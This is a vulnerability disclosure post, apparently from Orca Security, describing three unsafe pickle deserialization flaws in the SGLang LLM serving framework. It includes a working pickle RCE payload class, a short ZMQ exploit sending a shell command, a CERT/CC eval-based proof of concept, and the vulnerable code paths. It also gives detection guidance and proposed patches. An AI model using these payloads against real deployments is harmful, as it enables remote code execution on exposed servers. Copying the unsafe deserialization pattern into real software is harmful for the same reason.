The Orca Security Research Pod continuously investigates the security posture of widely adopted AI/ML infrastructure. During a focused audit of LLM serving frameworks, I discovered multiple unsafe deserialization vulnerabilities in SGLang, a popular open-source framework for serving large language models and multimodal AI models. These findings were coordinated through CERT/CC (case VU#665416), with additional analysis contributed by CERT/CC vulnerability researcher Christopher Cullen.

Three CVEs have been assigned: CVE-2026-3059, CVE-2026-3060, and CVE-2026-3989. The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network. The third involves insecure deserialization in a crash dump replay utility. At the time of publication, the SGLang maintainers have not responded to coordinated disclosure efforts, and no official patch is available.

Quick Overview

AttributeCVE-2026-3059CVE-2026-3060CVE-2026-3989
ComponentMultimodal generation ZMQ broker (scheduler_client.py)Disaggregation encoder receiver (encode_receiver.py)Crash dump replay script (replay_request_dump.py)
CWECWE-502 (Deserialization of Untrusted Data)CWE-502 (Deserialization of Untrusted Data)CWE-502 (Deserialization of Untrusted Data)
CVSS 3.19.8 Critical9.8 Critical7.8 High
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HAV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack VectorNetworkNetworkLocal
AuthenticationNoneNoneNone
User InteractionNoneNoneRequired
Affected Versions≥ 0.5.5 through latest (0.5.9 at time of publication)All versions with disaggregation moduleAll versions containing replay_request_dump.py
Fix AvailableNoNoNo

CVSS Rationale

CVE-2026-3059 and CVE-2026-3060 score 9.8 because the ZMQ broker binds to all available network interfaces (tcp://*) by default with zero authentication, and the pickle.loads() call executes immediately on any received payload. An attacker with network access to the exposed port needs nothing else – no credentials, no user interaction, no complex race conditions. The result is full code execution in the context of the SGLang process. This is a textbook unauthenticated network RCE. 

Note: The 9.8 base score reflects severity when the affected feature is active. The multimodal generation and disaggregation modules must be explicitly enabled; default text-only SGLang deployments do not expose the vulnerable broker.

CVE-2026-3989 scores 7.8 High (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). While the impact upon execution is the same as the network RCEs – full arbitrary code execution – the attack prerequisites are meaningfully different. This is a debugging utility in a scripts/playground/ directory; exploitation requires an attacker to plant a malicious .pkl file where an operator will manually load it, via write access to a crash dump directory or social engineering. It underscores the systemic nature of unsafe pickle usage throughout the SGLang codebase.

What Is SGLang?

SGLang is an open-source serving framework developed by LMSYS for running large language models and multimodal AI models in production. It supports a wide range of popular models – including Qwen, DeepSeek, Mistral, and Skywork – and provides OpenAI-compatible API endpoints. SGLang is designed for high-throughput, low-latency inference and is used across research labs and production deployments. In most production environments, SGLang runs inside containerized GPU inference infrastructure – Kubernetes pods, Docker containers, or dedicated GPU nodes. Compromising an SGLang instance could expose model weights, inference data, API credentials, GPU workloads, and potentially provide a pivot point into the surrounding cluster environment.

Technical Analysis

Root Cause: Python’s pickle on Untrusted Network Data

All three vulnerabilities share a single root cause: the use of Python’s pickle module to deserialize data from untrusted sources.

Python’s own documentation explicitly warns that the pickle module is not secure and should never be used to deserialize untrusted data. The reason is fundamental to how pickle works – a pickle stream doesn’t just encode data, it encodes instructions for reconstructing Python objects. An attacker can craft a pickle payload whose reconstruction instructions include arbitrary function calls, achieving full code execution the moment pickle.loads() runs.

This is not a novel class of vulnerability. The same pattern has led to RCE in other ML serving frameworks, notably CVE-2024-9053 in vLLM and CVE-2025-10164 in a previous SGLang component. The persistence of pickle-based deserialization in ML tooling is a systemic problem, and SGLang’s codebase contains over 20 instances of pickle.loads() across different modules.

How Pickle Deserialization Becomes Code Execution

For readers less familiar with Python internals, it’s worth understanding why pickle.loads() on untrusted data is equivalent to eval().

When Python pickles an object, it stores instructions for how to rebuild that object later. These instructions include which callable to invoke and what arguments to pass. The __reduce__ method on a Python class controls this process – it tells pickle how to “reduce” an object to a reconstructable form. Critically, the callable specified in __reduce__ is not restricted to constructors. It can be any callable, including os.system, subprocess.Popen, or eval.

Here is the core of our proof-of-concept payload:

class RCEPayload:
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        return (os.system, (self.cmd,))

When pickle.loads() processes a serialized RCEPayload, it doesn’t reconstruct an RCEPayload instance. Instead, it calls os.system(cmd) executing an arbitrary shell command. The pickle protocol faithfully follows the stored instructions with no sandboxing, no allowlisting, and no type checking.

The serialized payload is just bytes on the wire. There’s nothing in the pickle bytestream that distinguishes “safe data” from “malicious instruction.” From the ZMQ broker’s perspective, it receives bytes, calls pickle.loads(), and execution happens before any application-level validation could occur.

CVE-2026-3059: Multimodal Generation Broker – Full Code Flow

To understand the attack surface, we need to trace the complete path from server startup to deserialization.

Step 1: Server Launch

When an operator starts SGLang’s diffusion server:

python -m sglang.multimodal_gen.runtime.launch_server \
    --model-path stabilityai/stable-diffusion-3-medium \
    --port 8000

The FastAPI application lifecycle hook automatically starts the ZMQ broker as a background task:

@asynccontextmanager
async def lifespan(app: FastAPI):
    # ...
    broker_task = asyncio.create_task(run_zeromq_broker(server_args))
    yield
    broker_task.cancel()

The broker starts automatically as part of the application lifecycle when the multimodal server is running.

Step 2: Broker Binds to All Interfaces

The broker opens a ZeroMQ REP socket and binds to tcp://*:{broker_port}:

async def run_zeromq_broker(server_args: ServerArgs):
    ctx = zmq.asyncio.Context()
    socket = ctx.socket(zmq.REP)
    broker_endpoint = f"tcp://*:{server_args.broker_port}"  # ALL interfaces
    socket.bind(broker_endpoint)

The tcp://* binding means the broker listens on all available network interfaces – 127.0.0.1, the machine’s LAN IP, any public IP, and any container/pod network interface. The broker port defaults to http_port + 1. In the launch example above (--port 8000), the broker listens on port 8001. With SGLang’s default HTTP port of 30000, the broker would be on port 30001.

Although broker_host exists as a field in ServerArgs, the original code ignores it and hardcodes the binding to *.

Step 3: Direct Deserialization of Network Data

The broker’s main loop receives raw bytes and passes them directly to pickle.loads():

while True:
        try:
            payload = await socket.recv()
            request_batch = pickle.loads(payload)  # <-- RCE here
            logger.info("Broker received an offline job from a client.")
            response_batch = await async_scheduler_client.forward(request_batch)
            await socket.send(pickle.dumps(response_batch))
        except Exception as e:
            logger.error(f"Error in ZMQ Broker: {e}", exc_info=True)
            try:
                await socket.send(pickle.dumps({"status": "error", "message": str(e)}))
            except Exception:
                pass

There are zero security boundaries between socket.recv() and pickle.loads(). No authentication check. No message format validation. No source IP filtering. No TLS. The ZMQ REP socket accepts connections from any source, and the first thing the code does with the received bytes is deserialize them with pickle.

Note also that the exception handler catches the error after the payload has already been deserialized and executed – the except block cannot prevent the RCE, it only handles downstream errors.

Step 4: Exploitation

From the attacker’s side, the exploit is minimal – a standard ZMQ REQ socket and a pickle payload:

ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")

payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
sock.send(payload)

This is a single-message exploit. The attacker connects, sends one ZMQ message, and the command executes. The ZMQ REP/REQ pattern even sends a response back, confirming that the broker processed the message.

CVE-2026-3060: Disaggregation Encoder Receiver

The same pickle deserialization pattern exists in a completely separate component – SGLang’s encoder parallel disaggregation system in encode_receiver.py (lines 202 and 643).

This module is activated when a user passes the --encoder-transfer-backend zmq_to_scheduler flag, enabling ZMQ-based transfer between encoder and scheduler components. Like the multimodal broker, it binds a ZMQ socket to tcp://* and calls pickle.loads() on incoming payloads without authentication.

The attack mechanics are identical to CVE-2026-3059, but the code is maintained by a different team within the SGLang project (@ByronHsu, @hnyls2002, @ShangmingCai). This is worth noting because it means patches – if they ever arrive – may land on different timelines for the two components.

CVE-2026-3989: Crash Dump Replay Script

The replay_request_dump.py utility in scripts/playground/ loads .pkl files with pickle.load() and no validation:

def read_records(files):
    records = []
    for f in files:
        tmp = pickle.load(open(f, "rb"))
        if isinstance(tmp, dict) and "requests" in tmp:
            records.extend(tmp["requests"])
        else:
            records.extend(tmp)
    return records

The script is designed to replay crash dumps generated by SGLang when --crash-dump-folder is configured. Here’s the attack scenario in concrete terms:

  1. SGLang writes crash dump .pkl files to a configured directory (e.g., /data/sglang_crash_dump/).
  2. An attacker with write access to that directory – or who can supply a file via social engineering (“can you replay this crash dump for me?”) – drops a malicious .pkl file.
  3. The operator runs: python3 replay_request_dump.py --input-file /data/sglang_crash_dump/malicious.pkl
  4. pickle.load() executes the attacker’s payload.

The PoC for this CVE (developed by CERT/CC) uses a payload that returns a valid {'requests': []} structure after executing its code, so the script continues running normally – the operator may not even notice the execution:

class POC:
    def __reduce__(self):
        payload = (
            "(__import__('pathlib').Path('poc_marker.txt').write_text("
            "'pickle payload executed\\n', encoding='utf-8'), {'requests': []})[1]"
        )
        return (eval, (payload,))

Proposed Patch Analysis

As part of the coordinated disclosure, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch with two changes:

Change 1: Localhost binding (effective)

# Original: binds to all interfaces
broker_endpoint = f"tcp://*:{server_args.broker_port}"

# Patched: binds to localhost by default
host = server_args.broker_host or "127.0.0.1"
broker_endpoint = f"tcp://{host}:{server_args.broker_port}"

This eliminates remote exploitation entirely. Even if pickle deserialization remains, an attacker would need local access to the machine.

Change 2: msgpack serialization with pickle fallback (partial)

The patch introduces _pack() / _unpack() functions that prefer msgpack but fall back to pickle:

def _unpack(b: bytes) -> Any:
    try:
        return _from_basic(msgpack.unpackb(b, raw=False))
    except Exception:
        return pickle.loads(b)  # Fallback still vulnerable

This is a pragmatic transition mechanism – it allows existing pickle-speaking components to continue working while new messages use msgpack. However, the fallback means that an attacker who crafts a payload that deliberately fails msgpack parsing (which any valid pickle stream will) still reaches pickle.loads().

With the localhost binding in place, this is a local-only risk and acceptable for a transitional fix. Without the localhost binding, the msgpack wrapper alone would not prevent remote exploitation.

The synchronous SchedulerClient class also still uses send_pyobj() / recv_pyobj() (ZMQ’s built-in pickle-based methods), but these connect to internal scheduler endpoints rather than the exposed broker, making them lower priority.

The real fix: Both changes together are effective as an immediate mitigation. The long-term fix requires replacing all 20+ pickle.loads() instances throughout the codebase with safe serialization – a significant engineering effort that the vendor would need to own.

Attack Flow (CVE-2026-3059 / CVE-2026-3060)

  1. The target runs SGLang with multimodal generation or disaggregation features enabled.
  2. The ZMQ broker binds to tcp://*:{port}, accessible from the network.
  3. The attacker connects to the exposed port and sends a pickle payload containing a malicious __reduce__ method.
  4. SGLang calls pickle.loads() on the payload, triggering arbitrary code execution.
  5. The attacker has code execution with the full privileges of the SGLang process.

No authentication. No headers. No API keys. Just a raw TCP connection and a pickle bytestream.

Affected Versions

ComponentIntroducedAffected RangeFixed Version
multimodal_gen (CVE-2026-3059)Commit 7bc1dae09 (2025-11-05)≥ 0.5.5 through latest (0.5.9+)None
Disaggregation module (CVE-2026-3060)Present in all versions with ZMQ disaggregationAll versions with featureNone
replay_request_dump.py (CVE-2026-3989)Present since script creationAll versionsNone

Disclosure Timeline

DateEvent
2026-02-04Vulnerability discovered by Igor Stepansky (Orca Security)
2026-02-04GitHub Security Advisory (GHSA-3cp7-c6q2-94xr) submitted to SGLang
2026-02-04Report submitted to CERT/CC
2026-02-09CERT/CC creates case VU#665416; vendor invited
2026-02-09PoC files uploaded and validated
2026-02-10CERT/CC confirms disclosure date of March 26, 2026
2026-02-17CERT/CC reaches out directly to SGLang maintainers; no response
2026-02-23CVE-2026-3059 and CVE-2026-3060 assigned; CERT/CC indicates plans to contact CISA for additional assistance
2026-03-02CERT/CC develops proposed patch (msgpack + localhost binding)
2026-03-03GHSA-wxjp-55q2-vg27 opened with patch proposal
2026-03-11CVE-2026-3989 identified by CERT/CC (Christopher Cullen); CVE assigned

Despite multiple contact attempts through GitHub Security Advisories and direct email by CERT/CC – including outreach to CISA for assistance – the SGLang maintainers did not respond at any point during the coordination process. No vendor statement was obtained, and no official patch has been released.

Threat Status

Active Exploitation: No exploitation of these specific vulnerabilities has been observed in the wild at the time of publication.

PoC Availability: Functional proof-of-concept code for CVE-2026-3059 and CVE-2026-3060 exists and was shared with CERT/CC during coordination. A PoC for CVE-2026-3989 was developed by CERT/CC. Given the trivial nature of pickle deserialization exploits, weaponization requires minimal effort.

Important context: The multimodal generation and disaggregation features must be explicitly enabled for CVE-2026-3059 and CVE-2026-3060 to be exploitable. Default SGLang text-only inference deployments are not affected by these two CVEs. However, any deployment running multimodal_gen or disaggregation with ZMQ transport is immediately vulnerable if the broker port is network-reachable.

Detection Guidance

Network-level indicators for CVE-2026-3059 / CVE-2026-3060:

  • Monitor for unexpected inbound TCP connections to the ZMQ broker port (default: http_port + 1). ZMQ traffic on this port from external or untrusted source IPs is anomalous.
  • ZMQ uses a specific wire protocol – a ZMTP handshake followed by message frames. Network IDS signatures for ZMTP on unexpected ports can flag exposure.

Host-level indicators:

  • Unexpected child processes spawned by the SGLang Python process (e.g., /bin/sh, curl, wget, nc).
  • File creation in unusual locations by the SGLang process (e.g., /tmp/pwned, reverse shell scripts).
  • Outbound connections from the SGLang process to unexpected destinations.

Remediation

Immediate actions:

  • Network segmentation. Ensure ZMQ broker ports (default: http_port + 1) are not exposed to untrusted networks. Use firewall rules to restrict access to localhost or known internal clients only.
  • Review deployment flags. If you are not using multimodal generation or disaggregation features, ensure they are not enabled.
  • Audit crash dump handling. Do not run replay_request_dump.py on .pkl files from untrusted sources or shared directories with weak permissions.

Proposed Patch (Unmerged)

As detailed in the Patch Analysis section above, CERT/CC vulnerability researcher Christopher Cullen developed a proposed patch that binds the ZMQ broker to localhost by default and replaces pickle with msgpack serialization (with a transitional pickle fallback). This patch has been submitted to the SGLang maintainers via GitHub Security Advisory GHSA-wxjp-55q2-vg27 but has not been merged. Users may apply similar mitigations manually.

Long-Term Recommendation

SGLang’s codebase contains more than 20 instances of pickle.loads() and related unsafe deserialization calls. A comprehensive audit and migration to safe serialization formats (msgpack, JSON, or Protocol Buffers) is necessary to address the systemic risk.

The Bigger Picture: Pickle in AI/ML Infrastructure

This is not an isolated finding. Unsafe pickle deserialization is arguably the most prevalent vulnerability class in the Python AI/ML ecosystem. The pattern repeats across model serving frameworks, training pipelines, model registries, and utility scripts.

The reason is understandable: pickle is convenient. It serializes arbitrary Python objects with zero schema definition. For fast-moving ML projects focused on model performance rather than security hardening, pickle is the path of least resistance. But that convenience comes at a cost – every pickle.loads() call on untrusted input is an implicit eval().

Organizations deploying open-source LLM serving infrastructure should audit their dependencies for pickle usage, restrict network access to internal communication endpoints, and treat any pickle deserialization of external data as a critical security boundary.

How Can Orca Help?

The Orca Platform secures AI as an evolution of its core capabilities identifying, prioritizing, and remediating risk across cloud environments. With Orca, customers can:

  • inventory of AI models, cloud-managed AI services, unmanaged apps and other self-hosted AI frameworks
  • pinpoint where AI models and tools are running
  • detect sensitive data on the assets running AI projects, including training or fine-tuning datasets, as well as AI files
  • prioritize and remediate AI vulnerabilities and risks to AI workloads 

To learn more or see the Orca Platform in action, schedule a personalized 1:1 demo

Acknowledgments

Igor Stepansky (Orca Security) – vulnerability discovery, PoC development, and coordinated disclosure for CVE-2026-3059 and CVE-2026-3060

Christopher Cullen (CERT/CC) – coordination, patch development, CVE-2026-3989 discovery, and vulnerability note authoring

CERT/CC – case coordination (VU#665416)